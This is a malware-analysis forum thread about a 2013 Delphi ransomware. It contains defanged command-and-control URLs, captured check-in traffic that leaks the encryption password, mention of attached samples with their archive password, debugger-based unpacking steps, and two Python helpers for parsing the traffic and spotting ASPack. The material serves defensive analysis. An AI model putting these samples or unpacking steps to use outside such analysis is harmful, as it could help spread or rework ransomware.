A forum for reverse engineering, OS internals and malware analysis
 #19604  by r3shl4k1sh
 Tue Jun 11, 2013 9:30 am
Found this ransomware on a laptop.

The ransomware encrypted the user files (adds .crypt to the file name) and wants $300.
In addition it downloads various malware to the computer.

Anybody know what is the procedure to follow in order to decrypt the user files?

VT 29/47
https://www.virustotal.com/en/file/a69f ... /analysis/
 #19607  by Horgh
 Tue Jun 11, 2013 12:12 pm
I don't think this is Birele, or at least it doesn't look like the version I saw.
This is a Delphi crap ransomware detected by ESET as Win32_Filecoder.NAG.
The description of the malware corresponds to what I found in the sample (strings, infection process).

http://www.virusradar.com/en/Win32_File ... escription

Send data to : hxxp://infominfo.net/add/add.php
hxxp://infominfo.net/webmail/src/login.php <- webmail login
hxxps://infominfo.net/webstat/ <- panel
hxxp://37.221.162.51/ <- 'bitcoin mining proxy'

In attach: ASPack-packed ransom + fully unpacked.
pwd: infected
Edit: traffic with the server (lol)
POST /add/add.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Host: infominfo.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

password=JueLvpdtnDPKxaj

HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 11 Jun 2013 11:51:49 GMT
Content-Type: text/html
Content-Length: 30
Connection: keep-alive
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Vary: Accept-Encoding

12616:KENNETHPRIO808@mail.com
Edit2: [screenshot]

[screenshot]
 #19608  by Fabian Wosar
 Tue Jun 11, 2013 12:16 pm
Yeah, looks like a slightly updated variant of the crypto malware commonly referred to as Birele, essentially using the same encryption scheme and component (aeslib). The password is randomly generated and sent off to a server which returns an ID as well as the email address to contact. Previous versions implemented their own TCP/IP and string-based protocol. Looks like they switched to HTTP now:
POST /add/add.php HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Host: infominfo.net
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

password=PZUzhXaWlPbXIcB


HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 11 Jun 2013 11:34:00 GMT
Content-Type: text/html
Content-Length: 30
Connection: keep-alive
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Vary: Accept-Encoding

12612:MICHAELCERN821@mail.com
The Birele authors made some mistakes in the first versions, one of which was to save the password temporarily on the system and forget to delete it, or delete it in an insecure way, which made decryption possible. Unfortunately they corrected them, so decryption is no longer feasible without access to the server. So while technically my decrypter would still be able to decrypt encrypted files, it is useless without the correct key.

I also attached the unpacked sample if people are curious.
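The capture above is worth more to a responder than it looks: the randomly generated password (the key handed to aeslib) goes to the server in a plaintext HTTP POST, and the server answers with the victim ID and the contact address. The following parser, an added example rather than anything from the thread or from the malware, pulls both out of a captured exchange, including the case where the response is glued straight onto the request body as in Horgh's trace. The host and path are the ones quoted in the thread; the password and ID:email values are constructed.

```python
"""Extract key material from a captured Filecoder/Birele check-in (added example)."""
import re
from urllib.parse import parse_qs

# Constructed sample in the shape of the exchange quoted in the thread:
# host/path are the ones posted there, the password and ID:email are made up.
SAMPLE_REQUEST = (
    "POST /add/add.php HTTP/1.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 24\r\n"
    "Host: infominfo.net\r\n"
    "User-Agent: Mozilla/3.0 (compatible; Indy Library)\r\n"
    "\r\n"
    "password=ConstructedPw01"  # 9 + 15 bytes, matching the real Content-Length
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 30\r\n"
    "\r\n"
    "99999:EXAMPLEUSER@example.com\n"  # 30 bytes: placeholder ID:email
)
_HEADER_END = re.compile(r"\r?\n\r?\n")

def _read_message(data, pos):
    """Read one HTTP message at data[pos]: (start line, headers, body, next pos)."""
    end = _HEADER_END.search(data, pos)
    if end is None:
        raise ValueError("no end of headers")
    lines = data[pos:end.start()].splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Content-Length bounds the body, so the response is found even when the
    # capture glues "HTTP/1.1 200 OK" straight onto the password.
    body_end = end.end() + int(headers.get("content-length", "0"))
    return lines[0], headers, data[end.end():body_end], body_end

def parse_checkin(capture):
    """Return host, AES password, victim ID and contact email from one exchange."""
    req_line, req_hdrs, req_body, pos = _read_message(capture, 0)
    while pos < len(capture) and capture[pos] in "\r\n":  # tolerate blank lines
        pos += 1
    _, _, resp_body, _ = _read_message(capture, pos)
    victim_id, _, email = resp_body.strip().partition(":")
    return {"host": req_hdrs.get("host"), "password": parse_qs(req_body)["password"][0],
            "indy_ua": "Indy Library" in req_hdrs.get("user-agent", ""),
            "victim_id": victim_id, "contact_email": email}
```

The Indy Library User-Agent and the fixed `/add/add.php` path are the obvious proxy-log handles if no full capture exists.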
 #19610  by r3shl4k1sh
 Tue Jun 11, 2013 2:36 pm
Horgh wrote: [screenshot]
I was able to get to that by patching the exe but the malware starts to zero out all of the encrypted files, so it probably has some more protections inside.
 #19611  by Fabian Wosar
 Tue Jun 11, 2013 2:51 pm
r3shl4k1sh wrote:I was able to get to that by patching the exe but the malware starts to zero out all of the encrypted files, so it probably has some more protections inside.
Of course it does. I mean, what did you expect? Just because you patched the executable to show the "Unlock complete" message doesn't mean you magically get the correct key required to decrypt the files. Last time I checked AES doesn't operate on thin air alone ;).

The component used by the malware is available as source here by the way:
https://code.google.com/p/nadesiko/sour ... nt/aeslib/

Just in case you are curious :).
 #19638  by thisisu
 Fri Jun 14, 2013 9:46 am
Hi guys, sorry for the noob question but how did you find out this was compressed with ASPack (http://aspack.com/aspack.html)? I could not find that information with PEiD v0.95 or RDG Packer Detector v0.7.0. VT didn't tag it either. All I could tell was that it was not UPX due to no PUSHAD instruction. How did you know it wasn't PECompact, or PEtite (probably others too)? I'd just like to understand as well :) Thank you and great work as always.
 #19639  by Fabian Wosar
 Fri Jun 14, 2013 10:02 am
The file is actually packed/encrypted twice. The first layer is essentially a custom malware crypter. Doesn't do anything too fancy. Just allocates some memory using VirtualAlloc, then unpacks/decrypts the malware file into that buffer and then uses its custom PE loader to load and run the unpacked file. The malware file decrypted by the first layer is packed as well. This time with ASPack.

I have attached the intermediate step of the entire decryption/unpacking process where it is just a simple ASPacked file in case you are curious :).
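Once the first layer has been dumped, the quickest way to confirm the inner file is ASPack is to read its section table rather than trust a signature scanner: ASPack commonly adds sections named `.aspack` and `.adata`. The following reader is an added example, not code from the thread; it assumes the dump is a plain PE file, and the sample PE it builds for itself is constructed test data. A crypter can rename or strip those sections, so a hit is a hint, not proof.

```python
"""List the section names of a dumped PE and flag ASPack's usual ones (added example)."""
import struct
import sys

ASPACK_HINTS = {".aspack", ".adata"}  # section names ASPack commonly adds

def section_names(pe: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found; is this a raw memory region?")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size  # section headers follow the optional header
    names = []
    for i in range(n_sections):
        raw = pe[table + 40 * i: table + 40 * i + 8]  # 40-byte header, 8-byte name
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names

def looks_aspacked(pe: bytes) -> bool:
    """True if any of ASPack's characteristic section names is present."""
    return bool(ASPACK_HINTS & set(section_names(pe)))

def build_sample_pe(names):
    """Constructed minimal PE32 image with the given section names (test data only)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    opt = b"\0" * 0xE0                                    # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, len(opt), 0x102)
    sections = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in names)
    return dos + b"PE\0\0" + coff + opt + sections

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe([".text", ".aspack", ".adata"])
    print(section_names(data), "ASPack hint:", looks_aspacked(data))
```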
 #19640  by r3shl4k1sh
 Fri Jun 14, 2013 10:03 am
thisisu wrote:Hi guys, sorry for the noob question but how did you find out this was compressed with ASPack (http://aspack.com/aspack.html)? I could not find that information with PEiD v0.95 or RDG Packer Detector v0.7.0. VT didn't tag it either. All I could tell was that it was not UPX due to no PUSHAD instruction. How did you know it wasn't PECompact, or PEtite (probably others too)? I'd just like to understand as well :)
It is actually packed with something else (some kind of RunPE that creates a process and puts the ASPack file in it), and only after you dump it do you have the ASPack file.

If you want to unpack the first part, I suggest you set a bp on CreateProcess (since it is actually RunPE); afterwards you will see WriteProcessMemory calls. See where the third argument is pointing and dump that memory portion (I used OllyDump); this is the ASPack payload.

Before you get to the CreateProcess, this RunPE uses the GetSystemTime function in order to execute itself only at a specific time:

[screenshot]

Set a bp on @00138665 and change BX to match the [ebp-2de] value; then it will proceed and you will get to the CreateProcess call.